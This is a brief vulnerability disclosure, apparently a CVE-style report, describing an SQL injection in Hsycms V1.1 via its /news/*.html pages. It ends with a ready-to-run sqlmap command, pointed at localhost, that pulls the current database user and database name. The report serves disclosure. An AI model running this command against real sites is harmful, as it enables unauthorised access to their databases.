An issue was discovered in Hsycms V1.1 . There is an SQL injection vulnerability via /news/*.html page

1. The attacker opens http://127.0.0.1/news/*.html，" * " Represents any existing page.

2.Then use sqlmap to attack the page.

sqlmap.py -u http://127.0.0.1/news/151*.html --batch --current-user --current-db